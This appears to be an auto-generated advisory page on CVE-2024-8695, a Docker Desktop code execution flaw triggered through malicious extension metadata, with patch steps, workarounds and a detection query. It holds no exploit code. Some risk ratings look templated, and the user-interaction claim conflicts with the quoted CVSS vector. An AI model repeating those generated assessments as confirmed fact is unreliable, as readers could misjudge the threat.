CVE-2024-8695 – A remote code execution vulnerability in Docker... (How to Fix)

Q: What is the severity of CVE-2024-8695?

CVE-2024-8695 has a CVSS score of 9.8 (CRITICAL). A remote code execution vulnerability in Docker Desktop allows malicious extensions to execute arbitrary code by crafting malicious extension descriptions or changelogs. This affects all Docker Desktop users running versions before 4.34.2, potentially allowing attackers to compromise the host system.

📋 TL;DR

A remote code execution vulnerability in Docker Desktop allows malicious extensions to execute arbitrary code by crafting malicious extension descriptions or changelogs. This affects all Docker Desktop users running versions before 4.34.2, potentially allowing attackers to compromise the host system.

💻 Affected Systems

Products:

Docker Desktop

Versions: All versions before 4.34.2

Operating Systems: Windows, macOS, Linux

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in the extension management system and affects all default configurations where extensions can be installed.

📦 What is this software?

Desktop by Docker

View all CVEs affecting Desktop →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the host system with root/administrator privileges, enabling data theft, ransomware deployment, or persistent backdoor installation.

🟠

Likely Case

Malicious extension authors could execute arbitrary code on users' systems, potentially stealing credentials, cryptocurrency wallets, or sensitive development data.

🟢

If Mitigated

With proper extension vetting and limited extension installation, impact is reduced to only trusted extension sources, though still significant if a trusted extension is compromised.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires user to install a malicious extension, but the technical complexity of crafting the exploit is low once the vulnerability is understood.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.34.2

Vendor Advisory: https://docs.docker.com/desktop/release-notes/#4342

Restart Required: Yes

Instructions:

1. Open Docker Desktop. 2. Navigate to Settings > Software Updates. 3. Click 'Check for Updates'. 4. Install version 4.34.2 or later. 5. Restart Docker Desktop.

🔧 Temporary Workarounds

Disable Extension Installation

all

Prevent installation of new extensions to block potential malicious extensions.

Remove All Extensions

all

Uninstall all existing extensions to eliminate potential attack vectors.

docker extension rm [extension-name] for each installed extension

🧯 If You Can't Patch

Disable Docker Desktop extensions completely
Use Docker Engine directly without Docker Desktop

🔍 How to Verify

Check if Vulnerable:

Check Docker Desktop version in Settings > Software Updates. If version is below 4.34.2, system is vulnerable.

Check Version:

docker version --format '{{.Client.Version}}' (for Docker CLI) or check Docker Desktop GUI

Verify Fix Applied:

Confirm Docker Desktop version is 4.34.2 or higher in Settings > Software Updates.

📡 Detection & Monitoring

Log Indicators:

Unusual extension installation activity
Suspicious process execution from Docker Desktop context
Unexpected network connections from Docker Desktop processes

Network Indicators:

Outbound connections from Docker Desktop to unexpected destinations
DNS queries for suspicious domains from Docker processes

SIEM Query:

process_name:"Docker Desktop" AND (process_cmdline:"extension" OR event_type:"process_execution")

📊 Metadata

CVE ID: CVE-2024-8695

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-79

Published: September 12, 2024

Last Updated: September 13, 2024

🔗 References

https://docs.docker.com/desktop/release-notes/#4342 Release Notes

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-8695, you might also want to check these: